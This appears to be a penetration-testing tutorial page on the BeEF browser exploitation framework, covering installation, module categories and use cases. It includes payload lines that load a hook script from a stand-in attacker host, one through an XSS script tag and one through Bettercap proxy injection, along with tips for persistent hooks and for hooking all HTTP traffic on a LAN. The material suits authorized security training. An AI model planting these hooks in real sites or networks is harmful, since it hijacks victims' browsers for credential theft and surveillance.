BeEF — Browser Exploitation Framework

Browser Exploitation Framework — hook browsers and perform client-side attacks.

What is BeEF?

BeEF (Browser Exploitation Framework) is a penetration testing tool that focuses entirely on web browser vulnerabilities. Rather than attacking the network or OS layer, BeEF hooks victim browsers via a small JavaScript payload — typically injected through an XSS vulnerability or a malicious page — and turns them into remotely controlled clients. Once hooked, an operator can run hundreds of modules against the victim's browser: fingerprinting, credential harvesting, webcam access, social engineering overlays, network pivoting, and integration with Metasploit for full exploitation chains.

⚠ Legal Notice

Only use on systems you own or have explicit written permission to test. Unauthorized use violates Pakistan's PECA 2016 and international cybercrime laws.

Installation

# Update packages
sudo apt update

# Install BeEF (pre-installed on Kali as beef-xss)
sudo apt install beef-xss -y

# OR install manually from source
git clone https://github.com/beefproject/beef.git
cd beef
sudo ./install

# Start BeEF
sudo beef-xss

# Default web UI:  http://127.0.0.1:3000/ui/panel
# Default creds:   beef / beef  (change in config.yaml immediately)

How It Works

# The hook script is served by BeEF's built-in web server:
# http://[attacker-ip]:3000/hook.js

# Deliver the hook to a victim browser via:
# 1. Reflected/stored XSS on a target site:
#    <script src="http://attacker.com:3000/hook.js"></script>

# 2. A cloned phishing page (use with Social Engineering Toolkit)
# 3. A MITM injection via Bettercap's http.proxy module:
#    set http.proxy.injectjs http://attacker.com:3000/hook.js
#    http.proxy on

# Once hooked, the victim's browser appears in the BeEF web UI
# under "Hooked Browsers" — select it to run modules.

Key Module Categories

Network — Port scan the victim's internal network via their browser
Browser — Fingerprint browser version, plugins, extensions, and cookies
Social Engineering — Fake update dialogs, credential phishing overlays, fake Flash prompts
Host — Detect OS, installed software, and clipboard contents
Metasploit — Launch browser exploit modules directly from Metasploit via BeEF's bridge
Persistence — Keep the hook alive across page navigations using iframes or workers
Webcam / Mic — Request access to camera and microphone (requires user permission prompt)
Tunneling — Use the hooked browser as a proxy to reach internal network resources

Common Use Cases

Demonstrating the real-world impact of XSS vulnerabilities during authorized assessments
Client-side attack chains combined with Metasploit for full compromise
CTF (Capture The Flag) challenges involving browser exploitation
Internal red team social engineering simulations

Tips & Best Practices

Change the default credentials in /etc/beef-xss/config.yaml before starting BeEF — the defaults are publicly known. For persistent hooks across navigation, use the persistence module to respawn the hook via a hidden iframe. Combine BeEF with Bettercap's http.proxy injection module to hook every unencrypted HTTP session on a LAN without needing an XSS vulnerability at all.

Practice on legal targets like TryHackMe, HackTheBox, or hackzia.site labs before using in live engagements.